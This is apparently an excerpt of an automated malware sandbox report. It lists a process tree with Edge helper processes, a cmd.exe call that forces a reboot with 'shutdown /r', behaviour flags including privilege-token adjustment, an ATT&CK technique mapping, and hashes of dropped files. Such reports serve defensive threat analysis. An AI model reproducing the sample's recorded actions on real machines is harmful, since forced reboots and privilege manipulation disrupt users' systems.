C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,14013192708881463554,10163474356226534020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6568 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:5952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,14013192708881463554,10163474356226534020,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:14⤵PID:5336
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c shutdown /r2⤵
- System Location Discovery: System Language Discovery
PID:4528 -
C:\Windows\SysWOW64\shutdown.exeshutdown /r3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3444
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1436
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3232
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Account Manipulation
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Indicator Removal
1Network Share Connection Removal
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD534d2c4f40f47672ecdf6f66fea242f4a
SHA14bcad62542aeb44cae38a907d8b5a8604115ada2
SHA256b214e3affb02a2ea4469a8bbdfa8a179e7cc57cababd83b4bafae9cdbe23fa33
SHA51250fba54ec95d694211a005d0e3e6cf5b5677efa16989cbf854207a1a67e3a139f32b757c6f2ce824a48f621440b93fde60ad1dc790fcec4b76edddd0d92a75d6
-
Filesize
152B
MD58749e21d9d0a17dac32d5aa2027f7a75
SHA1a5d555f8b035c7938a4a864e89218c0402ab7cde
SHA256915193bd331ee9ea7c750398a37fbb552b8c5a1d90edec6293688296bda6f304
SHA512c645a41180ed01e854f197868283f9b40620dbbc813a1c122f6870db574ebc1c4917da4d320bdfd1cc67f23303a2c6d74e4f36dd9d3ffcfa92d3dfca3b7ca31a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize3KB
MD58d86767962f7f2a31a390c721041b0ed
SHA1cb44702879f128f584d6af8bf885b8e14d53387f
SHA2568ca83c3d2bbef9f708a99c2231394bfa9c966f29d00774e47372f5861c18ad5f
SHA51249c7ee249071dfbd72d249db39a17727f7a7507f686fd0ff13b9920b95791b89c7812dff52b49843dd6e531456eb1430d4d57fe944297d91ec9b04a958dc6ce5
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
1KB
MD5da7e7fe397bfc821ccabc3061264e890
SHA109302f394326c3314574b0832ed7100c043a3619
SHA256b0a6126ee17be8d8697bd2945dda6a32a8be9de492b6f171033cac8b559b659a
SHA5121a163540b98f755051bb2181cc5430075ba60705e5382865e5e64922da1d89bf7f17e90b2be72e69a35b86353fdccd9784fdae950bfd0a7e57c44f1f38a661c5
-
Filesize
7KB
MD5a45f9769bec6b754b8ccb293ec56d253
SHA1f0e91b8064fb745d9918b031be5a1a46c5d4ff63
SHA256a8a22c28167053a1f226b3eeff66aee10be99aae329cdfb5bb9ffc48b12e9f2b
SHA5129b639ecc6f27cf43f2f7d0a28c6731d85084f8000b796e096c95ffda2ffa076820ab001224e536dfcadb5852fb5e698be280880b7d7a7a01da15fba1f22bd420
-
Filesize
7KB
MD579ea024e0c361ed63b29ec2bf3974bd9
SHA1f638e8e54198f053012785e02c623c61262a1102
SHA25613a416dc84cdee34e1b56eff6c9ce0508288dbd5e4c390f8095cf53e8fd09dec
SHA512598bf590df7f3b4fd5a18430d1354bffe3a43fe76fd6b05a2d4a3a0440bf45b36ea8a45553937ba401a25f6ce1b5b0df723fd7576868ffc8e5f59e7bfc930722
-
Filesize
5KB
MD524970fcb8471c014cc0e0fceb7a9e145
SHA19c02a29a47e1ff102e5e24f38ea0b043ccbeaf66
SHA256048891df997c847a81b69b86262bfc74c3baf75b814b541e1c4ea8170849b6d9
SHA5128a6460324f062e1bbfcf6f5722760712483e597814f3f28bf63435b6e23784abe28e5b6d6303e77ff72b22d4e6b6a6efe8e00138b3fc63d8de7d08d828677a8a
-
Filesize
1KB
MD5a3224ffbf21bff6b3255a0a1f60fc5a2
SHA1482ae7ce1f0505d6cf97baea68faddc445dc464d
SHA256beb68cf473cc0ab47d37cce2099b664dfa451b0005885e7a8d1f9fdcdcc53187
SHA512e309d416449317618e0e8afb97dd7c27711899e319bd4e8978d3c6958ea82c2b5a5c5ebb958870f0c4dd7871dc03e603444b969d592b02ba10f5eec144c4b287
-
Filesize
1KB
MD5fc73bcdea67d271ffaacedd2514b104d
SHA1645a7c2290840a83529d72bb41006e11d269cc26
SHA256ff23137aa882b9b3a85f741a29129e2bdfebbb15d5fa27fb29e11bf5dd0a04ad
SHA512a9b91c7681a06fdf3d9de5ddb3ed2097e57ab9c51fd0750a097b0ec92ba420c9617acd69d55d93eb193a750667dcf79e684a663efed57cd604d6f969e6956147
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD50f03d711f4bd5b32ee2d76f80364c554
SHA14a454ca63b3147d9f1295a23d9d01be2beb8771a
SHA2565f77bef4cbf142e7b9bf68a36ecfae38bc462825b8466c93760cb07507042657
SHA512599653793c752946b2635fbb21e10ae87bfbb05fb666eb0dd494949d33cffe28235fafd785bb078c2e14ed86f45deea33f09483932374b115163c27c0631760d
-
Filesize
8KB
MD5cd74d189eed5d26d11d80f43f17c44c3
SHA1431c1038a617787f320ab8aa2061e2621547d7b3
SHA25684fede724bdb60fdeee5873bef6ce71f32e881bd5c83e9533dbd700191ab895c
SHA5125d9e05b87b58653354bbb10b8d718b0ceb666113ee025c9fc48f0dee143fb1c4f835026330f1a9cf6eaa1bc4a2016b234890bfb2e2d18eed75393f62647ce314
-
Filesize
10KB
MD52f428a1c8cc6aa273e023781520709d0
SHA1b8dcc6757ebfaaac2de82649ef88100054465e6a
SHA25692791b7b067e3a9dcd32c7a2b4fd01cb7c7802654dc68bed736b692f65a6a80d
SHA512b02e73d367cfefa40eeda4fa95a25ac96de6be144378efd7840919f59526b24db212972995774eb956df770b376871e038e4e4f0bb397df9d5af33c48f424a6b
-
Filesize
3.1MB
MD547ec64e3d129b23c44f417cbc2a07aa7
SHA1e65fbcf69e6e808ebe7bc9b13e483c5fc80d5fa2
SHA256ccb17adb4b57a95a61acb010c01da98dc150be67a85df2ab40ba9d1f078f8373
SHA51252247a235b708e98efcf977fd109344e16df9c5a9f13ad5afd395df3f009d9ee6edf81fef9d74a31a9fdec1f851e61642912eb9bc8384b39042b70f9d8b7d510
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e